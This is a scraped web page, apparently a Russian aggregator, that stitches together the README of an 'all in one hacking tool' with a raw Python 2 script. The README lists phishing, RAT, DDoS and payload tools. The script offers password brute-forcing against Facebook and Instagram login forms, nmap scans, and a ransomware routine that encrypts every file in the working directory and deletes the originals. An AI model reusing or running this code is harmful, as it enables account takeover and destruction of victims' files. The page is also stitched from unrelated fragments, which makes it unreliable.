Github kali linux hack

Github kali linux hack

All in One Hacking tool For Hackers 🥇

Install Kali Linux in WIndows10 Without VirtualBox YOUTUBE

Update Available V1.1.0 🚀

  • Added New Tools
    • Reverse Engineering
    • RAT Tools
    • Web Crawling
    • Payload Injector
  • Multitor Tools update
  • Added Tool in wifijamming
  • Added Tool in steganography

Anonymously Hiding Tools

Information gathering tools

  • Network Map (nmap)
  • Dracnmap
  • Port scanning
  • Host to IP
  • Xerosploit
  • RED HAWK (All In One Scanning)
  • ReconSpider(For All Scaning)
  • IsItDown (Check Website Down/Up)
  • Infoga — Email OSINT
  • ReconDog
  • Striker
  • SecretFinder (like API & etc)
  • Find Info Using Shodan
  • Port Scanner — rang3r
  • Breacher

Wireless attack tools

SQL Injection Tools

Phishing attack tools

Web Attack tools

Post exploitation tools

Payload creation tools

Reverse engineering tools

DDOS Attack Tools

Remote Administrator Tools (RAT)

XSS Attack Tools

Android Hacking tools

IDN Homograph Attack

Email Verify tools

Hash cracking tools

Installation For Linux

This Tool Must Run As ROOT .

After Following All Steps Just Type In Terminal root@kaliLinux:

hackingtool

Thanks to original Author of the tools used in hackingtool

Please Don’t Use for illegal Activity

  • Release Tool
  • Add Tools for CTF
  • Want to do automatic

Your Favourite Tool is not in hackingtool or Suggestions Please CLICK HERE

Don’t Forgot to share with Your Friends

The new Update get will soon stay updated

Источник

Github kali linux hack

Copy raw contents

Copy raw contents

#!/usr/bin/env python
import mechanize
from bs4 import BeautifulSoup
import requests
import urllib
import urllib2
import requests
import ssl
import json
import nmap
import cookielib
import sys
import time
import socket
import SocketServer
import thread
from Crypto . Hash import SHA256
from Crypto . Cipher import AES
import os , random , sys , pkg_resources
print «Welcome To DK’s Community»
print «Note—> Press ctrl+C for Back(Option)»
def HackInfo ():
try :
print «Please Enter The Url Containing Form To Hack int Below Format:»
print «http://www.facebook.com/login»
url = raw_input ()
print «Hacking via urllib. «
scontext = ssl . SSLContext ( ssl . PROTOCOL_TLSv1_2 )
op = urllib . urlopen ( url , context = scontext )
data = op . read ()
cod = op . code
if ( cod == 200 ):
print str ( cod ) + » » + «Ok»
print data
print «»
print «Hacking Source Code via BeautifulSoup. «
bs = BeautifulSoup ( data , «lxml» )
print bs . title . string
print bs
print » \n «
else :
print «Please enter a valid url»
return
except KeyboardInterrupt :
return
def NmapSite ():
try :
print «Please Enter The Url Containing Form To Hack int Below Format:»
print «www.fb.com»
url = raw_input ()
ip = socket . gethostbyname ( url )
nm = nmap . PortScanner ()
print «Scanning. «
print «Ip: » + str ( ip )
print «Scan Result» + » \n » + str ( nm . scan ( ip , ’22-443′ ))
print «HostName: » + str ( nm [ ip ]. hostname ())
print «State: » + str ( nm [ ip ]. state ())
print «All_Protocols: » + str ( nm [ ip ]. all_protocols ())
list = []
print «tcp keys » + str ( nm [ ip ][ ‘tcp’ ]. keys ())
list = nm [ ip ][ ‘tcp’ ]. keys ()
size = len ( list )
for i in range ( size ):
print str ( list [ i ]) + «:» + str ( nm [ ip ]. tcp ( list [ i ]))
print «Udp: » + str ( nm [ ip ]. all_udp ())
print «Sctp: » + str ( nm [ ip ]. all_sctp ())
return
except KeyboardInterrupt :
return
def BruteforceForms ():
try :
print «Reminder—>Plz save your file in the directory in which this script is stored!»
url2 = «https://www.facebook.com/login.php?»
br = mechanize . Browser ()
br . set_handle_equiv ( True )
br . set_handle_gzip ( True )
br . set_handle_redirect ( True )
br . set_handle_referer ( True )
br . set_handle_robots ( False )
cj = cookielib . LWPCookieJar ()
br . set_cookiejar ( cj )
br . set_handle_refresh ( mechanize . _http . HTTPRefreshProcessor (), max_time = 1 )
br . open ( url2 )
ll = br . title ()
dec = ll . decode ( ‘UTF8’ )
print «Enter the username you want to bruteforce»
user = raw_input ()
print «Enter the name of password.txt file»
p = raw_input ()
flag = 0
with open ( p , «r» ) as ins :
for line in ins :
br . select_form ( nr = 0 )
br . method = ‘POST’
br [ ’email’ ] = user
br [ ‘pass’ ] = line
br . submit ()
ll = br . title ()
dec2 = ll . decode ( ‘UTF8’ )
print dec2
if ( dec != dec2 ):
print «Password Found=» + line
flag = 1
break
else :
print «Retrying. «
if ( flag == 0 ):
print «Password Not Found!»
return
except KeyboardInterrupt :
return
def Insta ():
try :
print «Reminder—>Plz save your file in the directory in which this script is stored!»
url = «https://www.instagram.com/accounts/login/?force_classic_login»
br = mechanize . Browser ()
br . set_handle_equiv ( True )
br . set_handle_gzip ( True )
br . set_handle_redirect ( True )
br . set_handle_referer ( True )
br . set_handle_robots ( False )
cj = cookielib . LWPCookieJar ()
br . set_cookiejar ( cj )
br . set_handle_refresh ( mechanize . _http . HTTPRefreshProcessor (), max_time = 1 )
br . addheaders = [( ‘User-Agent’ , ‘Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0’ )]
br . open ( url )
ll = br . title ()
dec = ll . decode ( ‘UTF8’ )
print «Enter the username you want to bruteforce»
user = raw_input ()
print «Enter the name of password.txt file»
p = raw_input ()
flag = 0
with open ( p , «r» ) as ins :
for line in ins :
br . select_form ( nr = 0 )
br . method = ‘POST’
br [ ‘username’ ] = user
br [ ‘password’ ] = line
br . submit ()
ll = br . title ()
dec2 = ll . decode ( ‘UTF8’ )
print dec2
if ( dec != dec2 ):
print «Password Found=» + line
flag = 1
break
else :
print «Retrying. «
if ( flag == 0 ):
print «Password Not Found!»
return
except KeyboardInterrupt :
return
def encrypt ( key , filename ):
chunksize = 64 * 1024
outFile = os . path . join ( os . path . dirname ( filename ), «(encrypted)» + os . path . basename ( filename ))
filesize = str ( os . path . getsize ( filename )). zfill ( 16 )
IV = »
for i in range ( 16 ):
IV += chr ( random . randint ( 0 , 0xFF ))
encryptor = AES . new ( key , AES . MODE_CBC , IV )
with open ( filename , «rb» ) as infile :
with open ( outFile , «wb» ) as outfile :
outfile . write ( filesize )
outfile . write ( IV )
while True :
chunk = infile . read ( chunksize )
if len ( chunk ) == 0 :
break
elif len ( chunk ) % 16 != 0 :
chunk += ‘ ‘ * ( 16 — ( len ( chunk ) % 16 ))
outfile . write ( encryptor . encrypt ( chunk ))
def decrypt ( key , filename ):
outFile = os . path . join ( os . path . dirname ( filename ), os . path . basename ( filename [ 11 :]))
chunksize = 64 * 1024
with open ( filename , «rb» ) as infile :
filesize = infile . read ( 16 )
IV = infile . read ( 16 )
decryptor = AES . new ( key , AES . MODE_CBC , IV )
with open ( outFile , «wb» ) as outfile :
while True :
chunk = infile . read ( chunksize )
if len ( chunk ) == 0 :
break
outfile . write ( decryptor . decrypt ( chunk ))
outfile . truncate ( int ( filesize ))
def allfiles ():
allFiles = []
f = open ( «EnCrYpTeD_FiLe_LiSt.txt» , «w+» )
for root , subfiles , files in os . walk ( os . getcwd ()):
for names in files :
if not names . startswith ( «(encrypted)» ):
f . write ( «(encrypted)» + names + » \n » )
else :
f . write ( names + » \n » )
allFiles . append ( os . path . join ( root , names ))
return allFiles
def ransomware ():
try :
choice = raw_input ( «Do you want to (E)ncrypt or (D)ecrypt? » )
password = raw_input ( «Enter the password: » )
encFiles = allfiles ()
if choice == «E» :
for Tfiles in encFiles :
if os . path . basename ( Tfiles ). startswith ( «(encrypted)» ):
print «%s is already encrypted» % str ( Tfiles )
pass
elif os . path . basename ( Tfiles ). startswith ( «EnCrYpTeD_FiLe_LiSt.txt» ):
print «Not Encryptable»
pass
elif Tfiles == os . path . join ( os . getcwd (), sys . argv [ 0 ]):
pass
else :
encrypt ( SHA256 . new ( password ). digest (), str ( Tfiles ))
print «Done encrypting %s» % str ( Tfiles )
os . remove ( Tfiles )
elif choice == «D» :
p = raw_input ( «Enter the file_list name to decrypt: » )
with open ( p , «r» ) as ins :
for ps in ins :
ps = ps . strip ()
if not os . path . exists ( ps ):
print «The file does not exist»
elif not ps . startswith ( «(encrypted)» ):
print «%s is already not encrypted» % ps
else :
decrypt ( SHA256 . new ( password ). digest (), ps )
print «Done decrypting %s» % ps
os . remove ( ps )
else :
print «Please choose a valid command.»
return
except KeyboardInterrupt :
return
def advnmap ():
try :
print «Please Enter The domain/ip you want to Nmap!»
x = raw_input ()
print » «
print «Syn Services Scanning. «
os . system ( «nmap -sS » + x )
print » «
print «Checking For Operating System. «
os . system ( «nmap -sT -sV » + x )
return
except KeyboardInterrupt :
return
Select = < 0 : HackInfo ,
1 : NmapSite ,
2 : BruteforceForms ,
3 : Insta ,
4 : ransomware ,
5 : advnmap
>
while ( 1 ):
try :
print «Let Us Start»
print «Choose Your Option Wisely»
print «0: HackInfo»
print «1: NmapSite»
print «2: Bruteforce Facebook»
print «3: Bruteforce Instagram»
print «4: Encrypt/Decrypt»
print «5: Advance Nmap»
print «6: Exit»
selector = int ( input ())
if ( selector >= 0 ) and ( selector 5 ):
Select [ selector ]()
elif ( selector == 6 ):
print «Exiting. «
time . sleep ( 1 )
print «. «
sys . exit ()
else :
print «Invalid Option. «
print «. «
print » \n «
time . sleep ( 1 )
except KeyboardInterrupt :
sys . exit ( 0 )
Читайте также:  Что такое кодачи линукс

You can’t perform that action at this time.

You signed in with another tab or window. Reload to refresh your session. You signed out in another tab or window. Reload to refresh your session.

Источник

Оцените статью